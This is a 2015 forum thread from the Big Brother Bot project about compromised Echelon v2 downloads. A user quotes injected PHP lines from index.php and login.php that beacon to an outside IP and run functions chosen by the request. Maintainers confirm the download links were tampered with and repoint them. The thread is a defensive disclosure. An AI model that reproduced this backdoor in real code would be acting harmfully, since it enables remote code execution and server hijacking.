thankyou
Donate to the B3 fund!

"even a small donation helps!"
Donate with PayPal!
Echelon v2 is not yet officially released! If you cannot get this dev-version installed, revert to version 1 as available in our download section.

Author Topic: Echelon Files Infected?  (Read 1567 times)

Offline oldboss

  • Newbie
  • *
  • Posts: 6
Echelon Files Infected?
« on: April 23, 2015, 07:23:26 AM »
So I was suffering from a DoS attack on our server - and found that it all linked back to Echelon, specifically the last lines of index.php and login.php - can someone please confirm this for me? Just downloaded a fresh set of files from official links and it still there.

EDIT: Files on SourceForge are not affected - the link to the echelon v2 download from here: http://forum.bigbrotherbot.net/downloads/?cat=7 is where it gets the file from an external website: [font='Segoe UI', Tahoma, sans-serif]http://www.itdc.ge/other_inc/WickedShell-echelon-v2-unfinished-64-g8434f07.zip[/font][/color][/url]


Index.php:
Code: [Select]
<?php require 'inc/footer.php'; @file_get_contents("http://95.215.44.219/api.php?x=".$_SERVER['HTTP_HOST'].$_SERVER["REQUEST_URI"]); @extract ($_REQUEST); @die ($ctime($atime)); ?>


Login.php:
Code: [Select]
<?php


 @file_get_contents("http://95.215.44.219/api.php?x=".$_SERVER['HTTP_HOST'].$_SERVER["REQUEST_URI"]); @extract ($_REQUEST); @die ($ctime($atime));


 require 'inc/footer.php';


} // end if/else of what kind of page this is.


?>


It creates a b3.php file in root of echelon which is then used to launch DoS attacks against informnapalm.org.
« Last Edit: April 23, 2015, 07:46:17 AM by oldboss »

Offline WickedShell

  • Moderator
  • Sr. Member
  • *
  • Posts: 201
    • GitHub - WickedShell
Re: Echelon Files Infected?
« Reply #1 on: April 23, 2015, 09:00:35 AM »
Those lines should not be there, if you look at the latest commit to echelon v2 in index.php https://github.com/WickedShell/echelon/blob/version2/echelon/index.php#L80 there should be no references to that server. The same applys to login.php. Neither of these should be there, and it appears that your files have been compromised. I don't know if your source was intending to modify them or not, but they are definetly not from any release history off of my github. If you want the last "clean" version that I worked you can download the files for the version 2 branch directly from github. https://github.com/WickedShell/echelon/archive/version2.zip

That said, I have not been working on Echelon 2 since Nov, 2013 so if there are outstanding security flaws, or if others have been maintaining their own patched versions I would not be to surprised.

Offline Courgette

  • Senior Dev.
  • Hero Member
  • *
  • Posts: 4883
    • Github repository
Re: Echelon Files Infected?
« Reply #2 on: April 23, 2015, 09:16:15 AM »
Thank you for raising this alert. The download links on the download section of our website were tampered with. I fixed those links and they now point to the github repositories.
we are sorry for any inconvenience this may have caused
« Last Edit: April 23, 2015, 09:38:07 AM by Courgette »

Offline xlr8or

  • [ www.xlrstats.com ]
  • Project Lead
  • Hero Member
  • *
  • Posts: 2057
    • The Art of Tactical Gaming
Re: Echelon Files Infected?
« Reply #3 on: April 23, 2015, 10:15:43 AM »
@Oldboss: How long did you have the compromised files installed? Or, how long ago did you download the first set of compromised files?
« Last Edit: April 23, 2015, 10:20:48 AM by xlr8or »

Offline oldboss

  • Newbie
  • *
  • Posts: 6
Re: Echelon Files Infected?
« Reply #4 on: April 23, 2015, 10:39:17 AM »
Thank you for raising this alert. The download links on the download section of our website were tampered with. I fixed those links and they now point to the github repositories.
we are sorry for any inconvenience this may have caused
No worries, just glad I could get it sorted for my own sake :)

@Oldboss: How long did you have the compromised files installed? Or, how long ago did you download the first set of compromised files?

That file was last edited April 2nd - so at the latest that date - let me know if you would like any more info.

Offline xlr8or

  • [ www.xlrstats.com ]
  • Project Lead
  • Hero Member
  • *
  • Posts: 2057
    • The Art of Tactical Gaming
Re: Echelon Files Infected?
« Reply #5 on: April 23, 2015, 11:26:44 AM »
Do you also remember when the infected package was first downloaded and installed on your server?

Offline oldboss

  • Newbie
  • *
  • Posts: 6
Re: Echelon Files Infected?
« Reply #6 on: April 23, 2015, 01:12:26 PM »
They were a fresh set of files downloaded and installed at some point between 30/3/2015 and 2/4/2015, sorry that's about as accurate as I can find out.
« Last Edit: April 23, 2015, 02:14:42 PM by oldboss »

 


Rate this page +1 at Google Search

anything